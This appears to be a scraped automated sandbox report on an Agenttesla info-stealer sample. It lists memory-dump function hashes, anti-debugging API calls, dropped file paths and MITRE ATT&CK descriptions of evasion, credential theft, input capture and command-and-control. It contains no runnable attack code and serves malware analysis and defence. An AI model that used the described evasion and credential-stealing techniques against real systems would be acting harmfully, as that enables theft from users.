Instruction ID: 7c0179c3c5f768a9dccd81b97314ff01c9a4ce912401da79821facf1166f8417
Opcode Fuzzy Hash: 0eb548d43bb255c59010fcbfd9f8f97e53ae70153249b8983c97abc3cb200283
Instruction Fuzzy Hash: C421EB717043059FCB24DFA9D8907AAB7BEEF84220F19C579C4498F355DB709849CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0A680110 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2191150703.000000000A680000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a680000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 681f998b122f8a938de0532bdeda375cf7329946b47694bfbf75711c0bb8b086
Instruction ID: b9c463cb37580ac34098e0d4c40073420df373fc39f9bb58fdebe9ad0e795b56
Opcode Fuzzy Hash: 681f998b122f8a938de0532bdeda375cf7329946b47694bfbf75711c0bb8b086
Instruction Fuzzy Hash: C31190717003059FDB28EAA9D89476AF7EEEF84221F19C53984498B359DB709849CB90

Uniqueness

Uniqueness Score: -1.00%

Function 016BD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2185029861.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_16bd000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: c9a09bd8c3b81e63c4496f0971def81de00fc297aa2faf4f829b8304225d90db
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 5D11CD72404240DFDB02CF44D9C4B96BF61FB84324F24C6A9D9090A257C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0A6816F0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2191150703.000000000A680000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a680000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f241be13f114b050a913891aedafe0a77b4b958052c97498c3d5d462d753187
Instruction ID: ff819e232fb5bd214910b9252956bae3391334789347707cc6ebd461130fe436
Opcode Fuzzy Hash: 5f241be13f114b050a913891aedafe0a77b4b958052c97498c3d5d462d753187
Instruction Fuzzy Hash: E511AB3661A3848FC713ABB8E8148967FB9DF9731074A82DFE4408B363C735880ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 0A680E6B Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2191150703.000000000A680000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a680000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7726039f856ecb16d8764da17438fb95b18e851f3f8584edf3bc457b11c7cd35
Instruction ID: e24b29da587d7977ef6a500e16ac643eadd2d2e4cfbf8ac2d04fd62ea37ac9bb
Opcode Fuzzy Hash: 7726039f856ecb16d8764da17438fb95b18e851f3f8584edf3bc457b11c7cd35
Instruction Fuzzy Hash: 5B11487550A3849FC7039BACE8148DA7FB4AF46310B0185A7E058DB372D731885ACF61

Uniqueness

Uniqueness Score: -1.00%

Function 016CD017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2185117980.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_16cd000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: aa851354d4bfa89ab49264aac13a572984d30424768b009a611bcdf5be0f2cdf
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 5711BE75604280DFDB12CF58D9C4B25BF61FB84714F24C6ADD8494B756C33AD40ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 016BD731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2185029861.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_16bd000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 011c018fbb440f0f83d384494fbd4ca457e88bc9baa1b45d953a1c977aed6057
Instruction ID: 63ad17a19cf0adb9531cd5623acfb1451c74d2d8c5df3f382f634d43a8965ee7
Opcode Fuzzy Hash: 011c018fbb440f0f83d384494fbd4ca457e88bc9baa1b45d953a1c977aed6057
Instruction Fuzzy Hash: 4F01A7710053849AE7108AAACDC4BF7BF98EF45328F18C479ED094E296D3799881CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 016BD730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2185029861.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_16bd000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54001905740eee26c836abe54790d2ee8d5dde1b5c909a1d1ec4b0a24953fb97
Instruction ID: 93ae473aee73f98524705f3510e4b339777e0e922f51981d0e261978c8fddddb
Opcode Fuzzy Hash: 54001905740eee26c836abe54790d2ee8d5dde1b5c909a1d1ec4b0a24953fb97
Instruction Fuzzy Hash: B0F0C8710043449EE7108A1ACDC4BA3FF98EF41338F18C46AED084E282C3799840CB70

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: lnYkIr.exePID: 7708, Parent PID: 7344COMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	2

Executed Functions

Function 013370A0 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0133711F

Memory Dump Source

Source File: 0000000E.00000002.3368108130.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1330000_lnYkIr.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: bcf626fff786d874466aa218ef009118032137fa66ab4bbe3100b8daa3e632b4
Instruction ID: 0511be6e5aefcdeaded2b6bf4f8a1633d4a0c679241ffd5b0f3397eebf2a0a29
Opcode Fuzzy Hash: bcf626fff786d874466aa218ef009118032137fa66ab4bbe3100b8daa3e632b4
Instruction Fuzzy Hash: FA2148B1C012598FDB10CFAAD884BEEFBF5AF49310F14845AE459A3250D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013370A8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0133711F

Memory Dump Source

Source File: 0000000E.00000002.3368108130.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1330000_lnYkIr.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: d79fba7d5e92d7d1d66c01b3f11e72f0918bd00f9e4cf2f091d92edd0ac08e77
Instruction ID: a4713a49beb16bf5ee71b4aef1bd71df1a9d4e1e489f23aadd98366a187d3742
Opcode Fuzzy Hash: d79fba7d5e92d7d1d66c01b3f11e72f0918bd00f9e4cf2f091d92edd0ac08e77
Instruction Fuzzy Hash: CE2125B2C012598FDB10CFAAD884BEEFBF5AF49310F14845AE459A3250D778A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 069FDBF0 Relevance: 1.5, APIs: 1, Instructions: 47
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 069FDC4D

Memory Dump Source

Source File: 0000000E.00000002.3380733514.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69f0000_lnYkIr.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5dded57d29f12c45f4947e59bf7e0cd99c688d75f0507ccab6094a3479c1a606
Instruction ID: a65dc48ebc8f4c1b3feb2ca3e6d5c7595e51041e9573d9ab846a015a98b9392f
Opcode Fuzzy Hash: 5dded57d29f12c45f4947e59bf7e0cd99c688d75f0507ccab6094a3479c1a606
Instruction Fuzzy Hash: 291103B58003488FDB20DFAAD584BDEBBF8EB48310F248419D519A3200C378A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 069FCD60 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 069FDC4D

Memory Dump Source

Source File: 0000000E.00000002.3380733514.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69f0000_lnYkIr.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 534f5022ee12b2ba4221e6d43283b4a4055a3527f7136bd8dcc0b4ba629145d0
Instruction ID: ae0a0ce5fe212f5670749ea7b8fae9fda06a0aa83a31e964c7ef690613e03920
Opcode Fuzzy Hash: 534f5022ee12b2ba4221e6d43283b4a4055a3527f7136bd8dcc0b4ba629145d0
Instruction Fuzzy Hash: FA1103B5C107488FDB20DFAAD584B9EBBF8EB48310F248459D519A7600D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E4D005 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3366592470.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_e4d000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 227aef67e4b75393fd007e6d9da89859549b1ed78a681901caa571aa4b31b48b
Instruction ID: 370b254f40ec6c050dd91cc67250ce4b0ad68e60715fe7765a28be463201a51e
Opcode Fuzzy Hash: 227aef67e4b75393fd007e6d9da89859549b1ed78a681901caa571aa4b31b48b
Instruction Fuzzy Hash: A4314B7550D3C49FCB13CB24D990711BF71AB57214F29C5EBD9898F2A3C23A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E4D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3366592470.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_e4d000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad525f9e1d4d2aa9520b64e2b964de0d31ec84bd09b03d7d337f554d9ae47dcf
Instruction ID: 512076e57a8cc3a82686f3d6fa69b21a885813d050b50e924a0f83281cf1793f
Opcode Fuzzy Hash: ad525f9e1d4d2aa9520b64e2b964de0d31ec84bd09b03d7d337f554d9ae47dcf
Instruction Fuzzy Hash: 6421F271608204DFCB15DF14ED80B26BBA6FB84318F24C56DE9095B296C37AD846CA62

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lnYkIr.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzuq32ob.u1b.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fv5xasf4.rpi.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ga4hat10.ybz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5tjpzaf.s5s.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nlawgkar.oii.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ny3uspx2.xmw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhe4w4cg.g22.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqq2bpia.wp5.ps1

C:\Users\user\AppData\Local\Temp\tmp9C71.tmp

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre